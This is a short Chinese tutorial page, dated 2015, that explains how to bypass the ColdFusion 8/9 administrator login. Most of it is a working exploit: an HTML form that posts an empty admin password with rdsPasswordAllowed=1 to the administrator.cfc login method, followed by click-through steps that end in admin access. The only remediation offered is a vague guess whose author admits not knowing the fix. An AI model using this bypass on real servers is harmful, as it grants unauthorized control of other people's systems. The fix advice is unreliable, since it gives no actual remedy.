网站地图    收藏   

主页 > 后端 > 网站安全 >

绕过coldfusion8登录界面登录后台 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台这是登录页面然后本地写一个表单提交页面form action=http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=...

coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台 
 
这是登录页面
 
然后本地写一个表单提交页面
 
 
<form action="http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=login" method="post">
    <input type="hidden" name="adminpassword" value="">
    <input type="hidden" name="rdsPasswordAllowed" value="1">
    <input type="submit">
</form>

 

 
保存为html运行
 
点击"提交查询"
 
然后再次访问登录页面,此时已进入后台
 


 
漏洞使用于coldfusion8、9版本 
 
修复方案:

修复方案是添加过滤方式吧,我也不清楚 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论